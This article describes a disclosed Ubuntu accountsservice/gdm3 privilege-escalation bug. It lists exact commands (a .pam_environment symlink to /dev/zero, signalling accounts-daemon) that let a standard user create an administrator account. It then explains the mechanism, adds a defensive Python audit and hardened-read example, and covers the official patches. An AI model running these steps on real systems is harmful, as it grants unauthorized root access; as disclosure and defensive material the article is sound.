How to Exploit Ubuntu’s Accounts‑Daemon & GDM3 Bug to Gain Root Without a Password

This article explains a critical Ubuntu desktop vulnerability discovered by GitHub researcher Kevin Backhouse, detailing step‑by‑step commands that let a standard user create a privileged sudo account, the underlying bugs in accounts‑service and GNOME Display Manager, and the official patches released to fix it.

Vulnerability Overview

GitHub security researcher Kevin Backhouse disclosed a privilege‑escalation vulnerability that affects all maintained Ubuntu desktop releases (20.10, 20.04, 18.04, 16.04). By creating a crafted .pam_environment symlink and manipulating the GNOME Region & Language settings, a regular user can cause the accounts-daemon service to lose its root privileges and subsequently create a new administrator account without knowing the system password.

Exploitation Steps

Create a symbolic link named .pam_environment that points to /dev/zero in the user’s home directory. If the file already exists, rename or back it up first.

ln -s /dev/zero .pam_environment

Open GNOME Settings → “Region & Language” and attempt to change the language. The dialog will freeze; return to the terminal without closing the settings window.

Observe that the accounts-daemon process consumes 100% CPU. Find its PID, e.g.:

pidof accounts-daemon

Typical output: 597

Pause the daemon with a SIGSTOP signal:

kill -SIGSTOP 597

Schedule a kill sequence that, after logout, sends SIGSEGV followed by SIGCONT to the daemon, forcing it to crash and reset:

nohup bash -c "sleep 30s; kill -SIGSEGV 597; kill -SIGCONT 597" &

Log out. After a short delay the system launches the initial‑setup wizard, which allows creation of a new user account. The newly created account is granted administrator privileges and can run sudo commands.

Underlying Mechanism

accounts‑service bug: Ubuntu ships a patched accountsservice daemon that reads a file named .pam_environment from the user’s home directory via the function is_in_pam_environment. When this file is a symlink to /dev/zero, the daemon reads an infinite stream of zeros, enters an endless loop, and drops its root privileges, which is why the unprivileged user is able to send it signals.

GNOME Display Manager (gdm3) bug: gdm3 queries accounts-daemon to determine the number of existing users. Because the daemon is stuck, gdm3 times out, assumes zero users, and launches gnome-initial-setup, which requires an administrator account. The setup therefore permits creation of a privileged user.
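
For defenders, the accounts-service half of this can be checked and guarded against as follows. This is an added example, not code from the original article or from the accountsservice patch: audit() flags a .pam_environment that is a symlink, device or oversized file, and read_bounded() shows a read that cannot be stalled by such a file. The function names, the 64 KiB cap and the /home/* layout are assumptions.

```python
import errno
import glob
import os
import stat

MAX_BYTES = 64 * 1024  # assumed cap; a real .pam_environment is a few short lines


def audit(home):
    """Classify <home>/.pam_environment without following or reading it."""
    path = os.path.join(home, ".pam_environment")
    try:
        st = os.lstat(path)  # lstat inspects the link itself, not its target
    except FileNotFoundError:
        return "absent"
    if stat.S_ISLNK(st.st_mode):
        return "symlink -> " + os.readlink(path)
    if not stat.S_ISREG(st.st_mode):
        return "not a regular file"
    if st.st_size > MAX_BYTES:
        return "oversized"
    return "ok"


def read_bounded(path, limit=MAX_BYTES):
    """Hardened read: refuse symlinks and devices, never read past limit."""
    flags = os.O_RDONLY | os.O_NOFOLLOW | os.O_NONBLOCK
    try:
        fd = os.open(path, flags)
    except OSError as exc:
        if exc.errno in (errno.ELOOP, errno.EMLINK):  # last component is a symlink
            raise ValueError("refusing symlink: " + path) from exc
        raise
    with os.fdopen(fd, "rb") as handle:
        # Check the object that was actually opened, which closes the
        # window between a path check and the read.
        if not stat.S_ISREG(os.fstat(handle.fileno()).st_mode):
            raise ValueError("not a regular file: " + path)
        data = handle.read(limit + 1)
    if len(data) > limit:
        raise ValueError("larger than %d bytes: %s" % (limit, path))
    return data.decode("utf-8", "replace").splitlines()


if __name__ == "__main__":
    for home in sorted(glob.glob("/home/*")):  # assumed home directory layout
        verdict = audit(home)
        if verdict not in ("absent", "ok"):
            print(home, verdict)
```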

Official Fix

The vulnerabilities were reported on 17 October. Ubuntu and GNOME maintainers have released patches that remove the vulnerable code paths and restore proper privilege handling. Users should apply the latest updates (e.g., via apt update && apt upgrade) as soon as possible. The issue only affects Ubuntu desktop editions; server installations and non‑GNOME desktop environments are not impacted.

Reference: https://securitylab.github.com/research/Ubuntu-gdm3-accountsservice-LPE
